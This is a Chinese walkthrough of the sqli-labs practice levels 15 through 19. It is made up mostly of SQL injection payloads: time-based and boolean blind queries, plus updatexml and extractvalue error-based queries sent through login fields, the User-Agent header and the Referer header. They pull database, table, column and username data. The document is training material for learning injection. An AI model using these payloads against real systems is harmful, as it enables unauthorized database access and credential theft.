目录
Less-15
随便输点什么...
抓包
admin' and1=1;
admin' and 1=2;#
盲注
使用延迟注入
猜数据库名字的长度
uname=admin'and if(length(database())=8,sleep(10),1) --+&passwd=password&submit=Submit
猜数据库的第一个字母
and if(left(database(),1)='s',sleep(10),1)
...依次类推...10秒简直太漫长了...
猜表名
uname=admin'and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(6),1)
uname=admin'and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(6),1)--+&passwd=password&submit=Submit
...找到user表...
还是使用另一种方法吧...
uname=admin' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23
猜列名
uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(6),1) --+
uname=admin' and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23
爆字段
uname=admin' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23
Less-16
抓包
错误,那改成"试试
还是错误
再试试加点东西,正确了!
但是
没有回显,那只能盲注喽...
基于布尔型的盲注和基于时间的盲注,选一个试试
猜数据库的长度
uname=admin") and (length(database())) = 8 %23 &passwd=password&submit=Submit
猜数据库名字
uname=admin") and (ascii(substr((select database()) ,1,1))) = 115 %23 &passwd=password&submit=Submit
uname=admin") and (ascii(substr((select database()) ,2,1))) = 101 %23 &passwd=password&submit=Submit
...依次进行...猜出数据库security
猜表的长度
uname=admin") and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 %23 &passwd=password&submit=Submit
uname=admin") and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 %23 &passwd=password&submit=Submit
...长度为5...会是users表吗?试试看
猜表的名字
uname=admin") and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23 &passwd=password&submit=Submit
或者使用left()
uname=admin") and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)="users" %23 &passwd=password&submit=Submit
找到users表了...
猜列的长度
uname=admin") and (length((select column_name from information_schema.columns where table_name="users" limit 4,1))) = 8 %23 &passwd=password&submit=Submit
猜列的名字
uname=admin") and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23 &passwd=password&submit=Submit
爆字段啦
uname=admin") and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23 &passwd=password&submit=Submit
..一个一个来...
Less-17
抓包
第一步,找闭合字符
在uname注入发现怎么都不行...
那么
uname=admin&passwd=password' and 1=1;#&submit=Submit
成功了,原来注入点换地方了...
使用updatexml (XML_document, XPath_string, new_value);
tips:XPATH_string是报错的关键。concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出!
0x7e为~,不属于xpath的语法格式;
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select user()),0x7e),1) %23&submit=Submit
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select datebase()),0x7e),1) %23&submit=Submit
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) %23&submit=Submit
发现并不全...怎么办呢...
一个一个的爆吧
爆数据库
uname=admin&passwd=password'and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1) %23 &submit=Submit
uname=admin&passwd=password'and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1) %23 &submit=Submit
爆security数据库中的表名
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 3,1),0x7e),1) %23 &submit=Submit
注意:如果没有where后面的语句那么将是所有的表名
爆列名
爆字段名
...等等等...
Less-18
页面有不一样的东西了
抓包
发现在uname与passwd里都不能找到使其能够闭合的字符
查看一下源代码
发现insert语句,将uagent,ip_address,username插入数据库
发现登录成功后,会输出IP与Agent
那我们试试
换个注入点
爆数据库名
'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '
也可以使用extractvalue()
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
爆表名
爆列名
爆字段
........
其实,也可一开始就登陆成功
看回显
可以猜测注入点是在user-agent
Less-19
这次我打算之间登录看看
有回显
可以猜测一下这次注入点应该在referer
嗯嗯,没错~
查看源代码